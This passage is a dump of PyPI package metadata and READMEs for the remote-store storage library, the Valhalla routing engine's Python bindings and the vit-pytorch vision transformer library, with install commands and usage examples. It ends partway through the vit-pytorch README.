|---------------------|----------|----------------------------| |Local filesystem |Built-in | | |Amazon S3 / MinIO |Built-in |`remote-store[s3]` | |S3 (PyArrow) |Built-in |`remote-store[s3-pyarrow]` | |SFTP / SSH |Built-in |`remote-store[sftp]` | |Azure Blob / ADLS |Planned | | ## Examples Runnable scripts in [`examples/`](https://github.com/haalfi/remote-store/tree/master/examples): |Script |What it shows | |--------------------------------------------------------------------------------------------------|-----------------------------------------------| |[quickstart.py](https://github.com/haalfi/remote-store/blob/master/examples/quickstart.py) |Minimal config, write, read | |[file_operations.py](https://github.com/haalfi/remote-store/blob/master/examples/file_operations.py)|Full Store API: read, write, delete, move, copy, list, metadata, type checks, capabilities, to_key| |[streaming_io.py](https://github.com/haalfi/remote-store/blob/master/examples/streaming_io.py) |Streaming writes and reads with `BytesIO` | |[atomic_writes.py](https://github.com/haalfi/remote-store/blob/master/examples/atomic_writes.py) |Atomic writes and overwrite semantics | |[configuration.py](https://github.com/haalfi/remote-store/blob/master/examples/configuration.py) |Config-as-code, `from_dict()`, multiple stores, S3/SFTP backend configs| |[error_handling.py](https://github.com/haalfi/remote-store/blob/master/examples/error_handling.py)|Catching `NotFound`, `AlreadyExists`, etc. | Interactive Jupyter notebooks are available in [`examples/notebooks/`](https://github.com/haalfi/remote-store/tree/master/examples/notebooks). ## Contributing See [CONTRIBUTING.md](https://github.com/haalfi/remote-store/blob/master/CONTRIBUTING.md) for the spec-driven development workflow, code style, and how to add new backends. ## Security To report a vulnerability, please use [GitHub Security Advisories](https://github.com/haalfi/remote-store/security/advisories/new) instead of opening a public issue. See [SECURITY.md](https://github.com/haalfi/remote-store/blob/master/SECURITY.md) for details. ## License MIT
text/markdown
Harald Alferi
null
null
null
MIT License Copyright (c) 2026 Harald Alferi Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
api, atomic-writes, azure-blob-storage, file-storage, filesystem, fsspec, object-storage, s3, sftp, storage-abstraction, streaming
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language...
[]
null
null
>=3.10
[]
[]
[]
[ "bump-my-version>=0.28; extra == \"dev\"", "jupyter; extra == \"dev\"", "moto[s3,server]; extra == \"dev\"", "mypy; extra == \"dev\"", "paramiko>=2.2; extra == \"dev\"", "pre-commit; extra == \"dev\"", "pyarrow>=14.0.0; extra == \"dev\"", "pytest; extra == \"dev\"", "pytest-cov; extra == \"dev\"", ...
[]
[]
[]
[ "Documentation, https://remote-store.readthedocs.io/", "Repository, https://github.com/haalfi/remote-store", "Changelog, https://github.com/haalfi/remote-store/blob/master/CHANGELOG.md", "Issues, https://github.com/haalfi/remote-store/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:13:01.349533
remote_store-0.4.3.tar.gz
908,725
aa/7d/eef432c30c52c71a8c28efb27c29970aaa5df32d8d3a839bbcfcd048b89b/remote_store-0.4.3.tar.gz
source
sdist
null
false
2d87cf9eb5e39e17114759bb4a2d665b
cac597befe8213ab30907bebf261b1b715e15b213e4f59cf31cf8959a1a8d116
aa7deef432c30c52c71a8c28efb27c29970aaa5df32d8d3a839bbcfcd048b89b
null
[ "LICENSE" ]
223
2.4
pyvalhalla
3.6.3
High-level bindings to the Valhalla C++ library
██▒ █▓ ▄▄▄ ██▓ ██░ ██ ▄▄▄ ██▓ ██▓ ▄▄▄ ▓██░ █▒▒████▄ ▓██▒ ▓██░ ██▒▒████▄ ▓██▒ ▓██▒ ▒████▄ ▓██ █▒░▒██ ▀█▄ ▒██░ ▒██▀▀██░▒██ ▀█▄ ▒██░ ▒██░ ▒██ ▀█▄ ▒██ █░░░██▄▄▄▄██ ▒██░ ░▓█ ░██ ░██▄▄▄▄██ ▒██░ ▒██░ ░██▄▄▄▄██ ▒▀█░ ▓█ ▓██▒░██████▒░▓█▒░██▓ ▓█ ▓██▒░██████▒░██████▒▓█ ▓██▒ ░ ▐░ ▒▒ ▓▒█░░ ▒░▓ ░ ▒ ░░▒░▒ ▒▒ ▓▒█░░ ▒░▓ ░░ ▒░▓ ░▒▒ ▓▒█░ ░ ░░ ▒ ▒▒ ░░ ░ ▒ ░ ▒ ░▒░ ░ ▒ ▒▒ ░░ ░ ▒ ░░ ░ ▒ ░ ▒ ▒▒ ░ ░░ ░ ▒ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ Valhalla is an open source routing engine and accompanying libraries for use with OpenStreetMap data. Valhalla also includes tools like time+distance matrix computation, isochrones, elevation sampling, map matching and tour optimization (Travelling Salesman). ## Build Status | Linux | macOS & Windows | Code Coverage | Timezone DB | ----- | --------------- | ------------- | ----------- | [![Build Linux](https://github.com/valhalla/valhalla/actions/workflows/linux.yml/badge.svg)](https://github.com/valhalla/valhalla/actions/workflows/linux.yml) | [![Windows & macOS CI](https://github.com/valhalla/valhalla/actions/workflows/osx_win_python_builds.yml/badge.svg)](https://github.com/valhalla/valhalla/actions/workflows/osx_win_python_builds.yml) | [![codecov](https://codecov.io/gh/valhalla/valhalla/branch/master/graph/badge.svg)](https://codecov.io/gh/valhalla/valhalla) | [![timezone_db](https://img.shields.io/badge/tzdb%20version-2025c-blue.svg)](https://github.com/valhalla/valhalla/actions/workflows/publish_tz_db.yml) ## License Valhalla, and all of the projects under the Valhalla organization, use the [MIT License](https://github.com/valhalla/valhalla/blob/master/COPYING). Avatar/logo by [Jordan](https://www.jaykaydraws.com/portfolio). OpenStreetMap data in the `./test/data` is licensed under [ODbL](https://opendatacommons.org/licenses/odbl/) and [copyrighted](https://www.openstreetmap.org/copyright) by OSM contributors. Additional information on licenses and other requirements concerning the data sources most frequently used by Valhalla can be found in [the docs](https://valhalla.github.io/valhalla/mjolnir/data_sources/). ## Overview There are several key features that we hope can differentiate the Valhalla project from other routing and network analysis engines. They are: - Open source software, on open source data with a very liberal license. Should allow for transparency in development, encourage contribution and community input, and foster use in other projects. - Tiled hierarchical data structure. Should allow users to have a small memory footprint on memory constrained devices, enable offline routing, provide a means for regional extracts and partial updates. - Dynamic, runtime costing of edges and vertices within the graph via a plugin architecture. Should allow for customization and alternate route generation. - C++ based API. Should allow for cross compilation of the various pieces to enable routing on offline portable devices. - A plugin based narrative and manoeuvre generation architecture. Should allow for generation that is customized either to the administrative area or to the target locale. - Multi-modal and time-based routes. Should allow for mixing auto, pedestrian, bike and public transportation in the same route or setting a time by which one must arrive at a location. ## Demo Server [FOSSGIS e.V.](https://fossgis.de) hosts a demo server which is open to the public and includes a full planet graph with an [open-source web app](https://github.com/gis-ops/valhalla-app) on <https://valhalla.openstreetmap.de>. The HTTP API is accessible on a slightly different subdomain, e.g. <https://valhalla1.openstreetmap.de/isochrone>. Usage of the demo server follows the usual fair-usage policy as OSRM & Nominatim demo servers (somewhat enforced by [rate limits](https://github.com/valhalla/valhalla/discussions/3373#discussioncomment-1644713)). ## Platform Compatibility Valhalla is fully functional on many Linux and Mac OS distributions, and is also used on iOS and Android devices. For Windows, not all functionality is fully supported yet. Building the Valhalla library works flawlessly, as well as the following application modules: - `TOOLS`: utilities to query and benchmark various components - `DATA_TOOLS`: utilities to build input data and handle transit - `PYTHON_BINDINGS`: use all actions (route, isochrones, matrix etc) via the Valhalla Python library (needs a full (i.e. development) Python distribution in the `PATH`) ## Organization The Valhalla organization is comprised of several library modules each responsible for a different function. The layout of the various modules is as follows: - [Midgard](https://github.com/valhalla/valhalla/tree/master/valhalla/midgard) - Basic geographic and geometric algorithms for use in the various other projects. - [Baldr](https://github.com/valhalla/valhalla/tree/master/valhalla/baldr) - The base data structures for accessing and caching tiled route data. - [Sif](https://github.com/valhalla/valhalla/tree/master/valhalla/sif) - Library used in costing of graph nodes and edges. This can be used as input to `loki` and `thor`. - [Skadi](https://github.com/valhalla/valhalla/tree/master/valhalla/skadi) - Library and service for accessing elevation data. This can be used as input to `mjolnir` or as a standalone service. - [Mjolnir](https://github.com/valhalla/valhalla/tree/master/valhalla/mjolnir) - Tools for turning open data into Valhalla graph tiles. - [Loki](https://github.com/valhalla/valhalla/tree/master/valhalla/loki) - Library used to search graph tiles and correlate input locations to an entity within a tile. This correlated entity (edge or vertex) can be used as input to `thor`. - [Meili](https://github.com/valhalla/valhalla/tree/master/valhalla/meili) - Library used to for map-matching. - [Thor](https://github.com/valhalla/valhalla/tree/master/valhalla/thor) - Library used to generate a path through the graph tile hierarchy. This path and attribution along the path can be used as input to `odin`. - [Odin](https://github.com/valhalla/valhalla/tree/master/valhalla/odin) - Library used to generate manoeuvres and narrative based on a path. This set of directions information can be used as input to `tyr`. - [Tyr](https://github.com/valhalla/valhalla/tree/master/valhalla/tyr) - Service used to handle http requests for a route communicating with all of the other valhalla APIs. The service will format output from `odin` and support json (and eventually protocol buffer) output. - [Tools](https://github.com/valhalla/valhalla/tree/master/src) - A set command line tools that exercise bits of functionality from the library components above and provide the basis for quality testing and performance benchmarking. - [Demos](https://github.com/valhalla/demos) - A set of demos which allows interacting with the service and APIs. ## Documentation Documentation is stored in the `docs/` folder in this GitHub repository. It can be viewed at [valhalla.github.io/valhalla](https://valhalla.github.io/valhalla). ## Installation For more information on binaries, see [Command Line Tools](#command-line-tools) section below and the [docs](https://valhalla.github.io/valhalla). ### From source If you want to build Valhalla from source, follow the [documentation](https://valhalla.github.io/valhalla/building/). ### With docker [![Test & Publish Docker image](https://github.com/valhalla/valhalla/actions/workflows/docker-build.yml/badge.svg)](https://github.com/orgs/valhalla/packages?repo_name=valhalla) To run Valhalla locally or your own server, we recommend using one of our [Docker images](https://github.com/orgs/valhalla/packages), see the [README](https://github.com/valhalla/valhalla/blob/master/docker/README.md). ### Via Python bindings [![pyvalhalla version](https://img.shields.io/pypi/v/pyvalhalla?label=pyvalhalla)](https://pypi.org/project/pyvalhalla/) We publish our (very) high-level Python bindings to PyPI with [`pyvalhalla`](https://pypi.org/project/pyvalhalla/). The Python packages don't only contain the Python bindings, they also provide access to the C++ executables, e.g. in the form of `python -m valhalla valhalla_build_tiles -h`. For more details, see the [Python README](https://valhalla.github.io/valhalla/README_python). To install the native C++ executables one doesn't even need to have root permissions or even have Python installed. Simply download the desired wheel from [PyPI](https://pypi.org/project/pyvalhalla), extract it with e.g. `unzip` and run the included `valhalla/bin/<binary>` directly. ### Via NodeJS bindings [![npm version](https://img.shields.io/npm/v/@valhallajs/valhallajs/latest?label=@valhallajs/valhallajs@latest)](https://www.npmjs.com/package/@valhallajs/valhallajs) [![npm version](https://img.shields.io/npm/v/@valhallajs/valhallajs/weekly?label=@valhallajs/valhallajs@weekly)](https://www.npmjs.com/package/@valhallajs/valhallajs) We provide high-level NodeJS binding: ```bash npm install @valhallajs/valhallajs ``` For more details, see the [NodeJS README](https://github.com/valhalla/valhalla/blob/master/src/bindings/nodejs/README.md). ## Contributing We :heart: contributions to Valhalla. They could be non-technical, e.g. translations into other languages via [Transifex](https://www.transifex.com/valhalla/valhalla-phrases/locales-en-us-json--transifex/) or documentation improvements, or technical ones like bug fixes or feature implementations. It's important to open an issue before setting out to work on a PR. Ideally, get familiar with our [Contribution guidelines](https://github.com/valhalla/valhalla/blob/master/CONTRIBUTING.md) first. ## Command Line Tools > [!TIP] > Easily install various Valhalla command line tools like `valhalla_build_tiles` or `valhalla_service` with the [Python bindings](https://valhalla.github.io/valhalla/README_python). ### `valhalla_service` aka one-shot mode If you can't (e.g. Windows Server) or don't want to have the full-fledged HTTP API running, you can have the (almost) exact same behavior with the 'valhalla_service' executable in so-called "one-shot" mode. It's simple, just pass the config file, the action (route, isochrone, matrix etc) and the stringified JSON request (or alternatively a file containing the request to circumvent shell command length issues): ``` valhalla_service valhalla.json isochrone '{"locations":[{"lat":42.552448,"lon":1.564865}],"costing":"auto","contours":[{"time":10,"color":"ff0000"}], "show_locations":true}' # Alternatively you can pass a file with the same contents valhalla_service valhalla.json isochrone isochrone_request.txt ``` It's important to note that all Valhalla logs for one-shot mode are piped to `stderr` while the actual JSON response will be in `stdout`. To completely silence the logs, pass `type: ""` to `midgard.logging` in the config file. ### Batch Script Tool - [Batch Run_Route](https://github.com/valhalla/valhalla/blob/master/run_route_scripts/README.md) ## Related projects The following projects are open-source and built with the intention to make it easier to use Valhalla and its features: - [**OpenStreetMapSpeeds**](https://github.com/OpenStreetMapSpeeds/): A project conflating open GPS data to improve Valhalla's speed classification. The current JSON is from early 2022 and can be downloaded [here](https://raw.githubusercontent.com/OpenStreetMapSpeeds/schema/master/default_speeds.json) and used by setting the path in the `mjolnir.default_speeds_config` config option. - [**valhalla-operator**](https://github.com/itayankri/valhalla-operator): A k8s operator to deploy and manage Valhalla. - [**valhalla-app**](https://github.com/gis-ops/valhalla-app): A React based web app for Valhalla, powering <https://valhalla.openstreetmap.de/>. - [**valhalla-qgis-plugin**](https://github.com/gis-ops/valhalla-qgis-plugin): A QGIS plugin for Valhalla, also available in the [official QGIS plugin store](https://plugins.qgis.org/plugins/valhalla/), featuring built-in `valhalla_service` and `valhalla_build_tiles`. - [**routingpy**](https://github.com/gis-ops/routingpy): A Python client for most open-source routing engines, including Valhalla, with a common interface for all engines. Available on [PyPI](https://pypi.org/project/routingpy/). - [**routingjs**](https://github.com/gis-ops/routingjs): A TypeScript client for most open-source routing engines, including Valhalla, with a common interface for all engines. Available as engine-specific packages on [npm](https://www.npmjs.com/package/@routingjs/valhalla). - [**Valhalla_jll.jl**](https://github.com/JuliaBinaryWrappers/Valhalla_jll.jl): Valhalla binaries shipped for Julia. - [**valhalla-go**](https://github.com/pufferffish/valhalla-go): Valhalla Golang bindings via cgo
text/markdown
Nils Nolde, Kevin Kreiser
null
null
null
null
null
[]
[]
null
null
>=3.9.0
[]
[]
[]
[ "numpy<3.0.0,>=2.0.0; extra == \"typing\"" ]
[]
[]
[]
[ "Homepage, https://github.com/valhalla/valhalla", "Documentation, https://valhalla.github.io/valhalla/", "Repository, https://github.com/valhalla/valhalla", "Issues, https://github.com/valhalla/valhalla/issues", "Changelog, https://github.com/valhalla/valhalla/blob/master/CHANGELOG.md" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:12:40.575129
pyvalhalla-3.6.3.tar.gz
35,746,107
04/67/f1fb5cb3df1fa19555acde4a99e8a7c97333fc2aa8e4077fdb191ddb0b60/pyvalhalla-3.6.3.tar.gz
source
sdist
null
false
2684faa29bde0e72bf51cb47d243af41
daee61451072739414026ce4b6b642fc534dea7bbc792eb68a9dd0c3a5d78604
0467f1fb5cb3df1fa19555acde4a99e8a7c97333fc2aa8e4077fdb191ddb0b60
MIT
[ "COPYING" ]
464
2.4
vit-pytorch
1.18.0
Vision Transformer (ViT) - Pytorch
<img src="./images/vit.gif" width="500px"></img> ## Table of Contents - [Vision Transformer - Pytorch](#vision-transformer---pytorch) - [Install](#install) - [Usage](#usage) - [Parameters](#parameters) - [Simple ViT](#simple-vit) - [NaViT](#navit) - [Distillation](#distillation) - [Deep ViT](#deep-vit) - [CaiT](#cait) - [Token-to-Token ViT](#token-to-token-vit) - [CCT](#cct) - [Cross ViT](#cross-vit) - [PiT](#pit) - [LeViT](#levit) - [CvT](#cvt) - [Twins SVT](#twins-svt) - [CrossFormer](#crossformer) - [RegionViT](#regionvit) - [ScalableViT](#scalablevit) - [SepViT](#sepvit) - [MaxViT](#maxvit) - [NesT](#nest) - [MobileViT](#mobilevit) - [XCiT](#xcit) - [Masked Autoencoder](#masked-autoencoder) - [Simple Masked Image Modeling](#simple-masked-image-modeling) - [Masked Patch Prediction](#masked-patch-prediction) - [Masked Position Prediction](#masked-position-prediction) - [Adaptive Token Sampling](#adaptive-token-sampling) - [Patch Merger](#patch-merger) - [Vision Transformer for Small Datasets](#vision-transformer-for-small-datasets) - [3D Vit](#3d-vit) - [ViVit](#vivit) - [Parallel ViT](#parallel-vit) - [Learnable Memory ViT](#learnable-memory-vit) - [Dino](#dino) - [EsViT](#esvit) - [Accessing Attention](#accessing-attention) - [Research Ideas](#research-ideas) * [Efficient Attention](#efficient-attention) * [Combining with other Transformer improvements](#combining-with-other-transformer-improvements) - [FAQ](#faq) - [Resources](#resources) - [Citations](#citations) ## Vision Transformer - Pytorch Implementation of <a href="https://openreview.net/pdf?id=YicbFdNTTy">Vision Transformer</a>, a simple way to achieve SOTA in vision classification with only a single transformer encoder, in Pytorch. Significance is further explained in <a href="https://www.youtube.com/watch?v=TrdevFK_am4">Yannic Kilcher's</a> video. There's really not much to code here, but may as well lay it out for everyone so we expedite the [attention](https://www.youtube.com/watch?v=eMlx5fFNoYc) revolution. For a Pytorch implementation with pretrained models, please see Ross Wightman's repository <a href="https://github.com/rwightman/pytorch-image-models">here</a>. The official Jax repository is <a href="https://github.com/google-research/vision_transformer">here</a>. A tensorflow2 translation also exists <a href="https://github.com/taki0112/vit-tensorflow">here</a>, created by research scientist <a href="https://github.com/taki0112">Junho Kim</a>! 🙏 <a href="https://github.com/conceptofmind/vit-flax">Flax translation</a> by <a href="https://github.com/conceptofmind">Enrico Shippole</a>! ## Install ```bash $ pip install vit-pytorch ``` ## Usage ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Parameters - `image_size`: int. Image size. If you have rectangular images, make sure your image size is the maximum of the width and height - `patch_size`: int. Size of patches. `image_size` must be divisible by `patch_size`. The number of patches is: ` n = (image_size // patch_size) ** 2` and `n` **must be greater than 16**. - `num_classes`: int. Number of classes to classify. - `dim`: int. Last dimension of output tensor after linear transformation `nn.Linear(..., dim)`. - `depth`: int. Number of Transformer blocks. - `heads`: int. Number of heads in Multi-head Attention layer. - `mlp_dim`: int. Dimension of the MLP (FeedForward) layer. - `channels`: int, default `3`. Number of image's channels. - `dropout`: float between `[0, 1]`, default `0.`. Dropout rate. - `emb_dropout`: float between `[0, 1]`, default `0`. Embedding dropout rate. - `pool`: string, either `cls` token pooling or `mean` pooling ## Simple ViT <a href="https://arxiv.org/abs/2205.01580">An update</a> from some of the same authors of the original paper proposes simplifications to `ViT` that allows it to train faster and better. Among these simplifications include 2d sinusoidal positional embedding, global average pooling (no CLS token), no dropout, batch sizes of 1024 rather than 4096, and use of RandAugment and MixUp augmentations. They also show that a simple linear at the end is not significantly worse than the original MLP head You can use it by importing the `SimpleViT` as shown below ```python import torch from vit_pytorch import SimpleViT v = SimpleViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## NaViT <img src="./images/navit.png" width="450px"></img> <a href="https://arxiv.org/abs/2307.06304">This paper</a> proposes to leverage the flexibility of attention and masking for variable lengthed sequences to train images of multiple resolution, packed into a single batch. They demonstrate much faster training and improved accuracies, with the only cost being extra complexity in the architecture and dataloading. They use factorized 2d positional encodings, token dropping, as well as query-key normalization. You can use it as follows ```python import torch from vit_pytorch.na_vit import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, token_dropout_prob = 0.1 # token dropout of 10% (keep 90% of tokens) ) # 5 images of different resolutions - List[List[Tensor]] # for now, you'll have to correctly place images in same batch element as to not exceed maximum allowed sequence length for self-attention w/ masking images = [ [torch.randn(3, 256, 256), torch.randn(3, 128, 128)], [torch.randn(3, 128, 256), torch.randn(3, 256, 128)], [torch.randn(3, 64, 256)] ] preds = v(images) # (5, 1000) - 5, because 5 images of different resolution above ``` Or if you would rather that the framework auto group the images into variable lengthed sequences that do not exceed a certain max length ```python images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v( images, group_images = True, group_max_seq_len = 64 ) # (5, 1000) ``` Finally, if you would like to make use of a flavor of NaViT using <a href="https://pytorch.org/tutorials/prototype/nestedtensor.html">nested tensors</a> (which will omit a lot of the masking and padding altogether), make sure you are on version `2.5` and import as follows ```python import torch from vit_pytorch.na_vit_nested_tensor import NaViT v = NaViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 images of different resolutions - List[Tensor] images = [ torch.randn(3, 256, 256), torch.randn(3, 128, 128), torch.randn(3, 128, 256), torch.randn(3, 256, 128), torch.randn(3, 64, 256) ] preds = v(images) assert preds.shape == (5, 1000) ``` ## Distillation <img src="./images/distill.png" width="300px"></img> A recent <a href="https://arxiv.org/abs/2012.12877">paper</a> has shown that use of a distillation token for distilling knowledge from convolutional nets to vision transformer can yield small and efficient vision transformers. This repository offers the means to do distillation easily. ex. distilling from Resnet50 (or any teacher) to a vision transformer ```python import torch from torchvision.models import resnet50 from vit_pytorch.distill import DistillableViT, DistillWrapper teacher = resnet50(pretrained = True) v = DistillableViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) distiller = DistillWrapper( student = v, teacher = teacher, temperature = 3, # temperature of distillation alpha = 0.5, # trade between main loss and distillation loss hard = False # whether to use soft or hard distillation ) img = torch.randn(2, 3, 256, 256) labels = torch.randint(0, 1000, (2,)) loss = distiller(img, labels) loss.backward() # after lots of training above ... pred = v(img) # (2, 1000) ``` The `DistillableViT` class is identical to `ViT` except for how the forward pass is handled, so you should be able to load the parameters back to `ViT` after you have completed distillation training. You can also use the handy `.to_vit` method on the `DistillableViT` instance to get back a `ViT` instance. ```python v = v.to_vit() type(v) # <class 'vit_pytorch.vit_pytorch.ViT'> ``` ## Deep ViT This <a href="https://arxiv.org/abs/2103.11886">paper</a> notes that ViT struggles to attend at greater depths (past 12 layers), and suggests mixing the attention of each head post-softmax as a solution, dubbed Re-attention. The results line up with the <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a> paper from NLP. You can use it as follows ```python import torch from vit_pytorch.deepvit import DeepViT v = DeepViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## CaiT <a href="https://arxiv.org/abs/2103.17239">This paper</a> also notes difficulty in training vision transformers at greater depths and proposes two solutions. First it proposes to do per-channel multiplication of the output of the residual block. Second, it proposes to have the patches attend to one another, and only allow the CLS token to attend to the patches in the last few layers. They also add <a href="https://github.com/lucidrains/x-transformers#talking-heads-attention">Talking Heads</a>, noting improvements You can use this scheme as follows ```python import torch from vit_pytorch.cait import CaiT v = CaiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of transformer for patch to patch attention only cls_depth = 2, # depth of cross attention of CLS tokens to patch heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05 # randomly dropout 5% of the layers ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Token-to-Token ViT <img src="./images/t2t.png" width="400px"></img> <a href="https://arxiv.org/abs/2101.11986">This paper</a> proposes that the first couple layers should downsample the image sequence by unfolding, leading to overlapping image data in each token as shown in the figure above. You can use this variant of the `ViT` as follows. ```python import torch from vit_pytorch.t2t import T2TViT v = T2TViT( dim = 512, image_size = 224, depth = 5, heads = 8, mlp_dim = 512, num_classes = 1000, t2t_layers = ((7, 4), (3, 2), (3, 2)) # tuples of the kernel size and stride of each consecutive layers of the initial token to token module ) img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## CCT <img src="https://raw.githubusercontent.com/SHI-Labs/Compact-Transformers/main/images/model_sym.png" width="400px"></img> <a href="https://arxiv.org/abs/2104.05704">CCT</a> proposes compact transformers by using convolutions instead of patching and performing sequence pooling. This allows for CCT to have high accuracy and a low number of parameters. You can use this with two methods ```python import torch from vit_pytorch.cct import CCT cct = CCT( img_size = (224, 448), embedding_dim = 384, n_conv_layers = 2, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) img = torch.randn(1, 3, 224, 448) pred = cct(img) # (1, 1000) ``` Alternatively you can use one of several pre-defined models `[2,4,6,7,8,14,16]` which pre-define the number of layers, number of attention heads, the mlp ratio, and the embedding dimension. ```python import torch from vit_pytorch.cct import cct_14 cct = cct_14( img_size = 224, n_conv_layers = 1, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_classes = 1000, positional_embedding = 'learnable', # ['sine', 'learnable', 'none'] ) ``` <a href="https://github.com/SHI-Labs/Compact-Transformers">Official Repository</a> includes links to pretrained model checkpoints. ## Cross ViT <img src="./images/cross_vit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.14899">This paper</a> proposes to have two vision transformers processing the image at different scales, cross attending to one every so often. They show improvements on top of the base vision transformer. ```python import torch from vit_pytorch.cross_vit import CrossViT v = CrossViT( image_size = 256, num_classes = 1000, depth = 4, # number of multi-scale encoding blocks sm_dim = 192, # high res dimension sm_patch_size = 16, # high res patch size (should be smaller than lg_patch_size) sm_enc_depth = 2, # high res depth sm_enc_heads = 8, # high res heads sm_enc_mlp_dim = 2048, # high res feedforward dimension lg_dim = 384, # low res dimension lg_patch_size = 64, # low res patch size lg_enc_depth = 3, # low res depth lg_enc_heads = 8, # low res heads lg_enc_mlp_dim = 2048, # low res feedforward dimensions cross_attn_depth = 2, # cross attention rounds cross_attn_heads = 8, # cross attention heads dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 256) pred = v(img) # (1, 1000) ``` ## PiT <img src="./images/pit.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.16302">This paper</a> proposes to downsample the tokens through a pooling procedure using depth-wise convolutions. ```python import torch from vit_pytorch.pit import PiT v = PiT( image_size = 224, patch_size = 14, dim = 256, num_classes = 1000, depth = (3, 3, 3), # list of depths, indicating the number of rounds of each stage before a downsample heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## LeViT <img src="./images/levit.png" width="300px"></img> <a href="https://arxiv.org/abs/2104.01136">This paper</a> proposes a number of changes, including (1) convolutional embedding instead of patch-wise projection (2) downsampling in stages (3) extra non-linearity in attention (4) 2d relative positional biases instead of initial absolute positional bias (5) batchnorm in place of layernorm. <a href="https://github.com/facebookresearch/LeViT">Official repository</a> ```python import torch from vit_pytorch.levit import LeViT levit = LeViT( image_size = 224, num_classes = 1000, stages = 3, # number of stages dim = (256, 384, 512), # dimensions at each stage depth = 4, # transformer of depth 4 at each stage heads = (4, 6, 8), # heads at each stage mlp_mult = 2, dropout = 0.1 ) img = torch.randn(1, 3, 224, 224) levit(img) # (1, 1000) ``` ## CvT <img src="./images/cvt.png" width="400px"></img> <a href="https://arxiv.org/abs/2103.15808">This paper</a> proposes mixing convolutions and attention. Specifically, convolutions are used to embed and downsample the image / feature map in three stages. Depthwise-convoltion is also used to project the queries, keys, and values for attention. ```python import torch from vit_pytorch.cvt import CvT v = CvT( num_classes = 1000, s1_emb_dim = 64, # stage 1 - dimension s1_emb_kernel = 7, # stage 1 - conv kernel s1_emb_stride = 4, # stage 1 - conv stride s1_proj_kernel = 3, # stage 1 - attention ds-conv kernel size s1_kv_proj_stride = 2, # stage 1 - attention key / value projection stride s1_heads = 1, # stage 1 - heads s1_depth = 1, # stage 1 - depth s1_mlp_mult = 4, # stage 1 - feedforward expansion factor s2_emb_dim = 192, # stage 2 - (same as above) s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, # stage 3 - (same as above) s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 4, s3_depth = 10, s3_mlp_mult = 4, dropout = 0. ) img = torch.randn(1, 3, 224, 224) pred = v(img) # (1, 1000) ``` ## Twins SVT <img src="./images/twins_svt.png" width="400px"></img> This <a href="https://arxiv.org/abs/2104.13840">paper</a> proposes mixing local and global attention, along with position encoding generator (proposed in <a href="https://arxiv.org/abs/2102.10882">CPVT</a>) and global average pooling, to 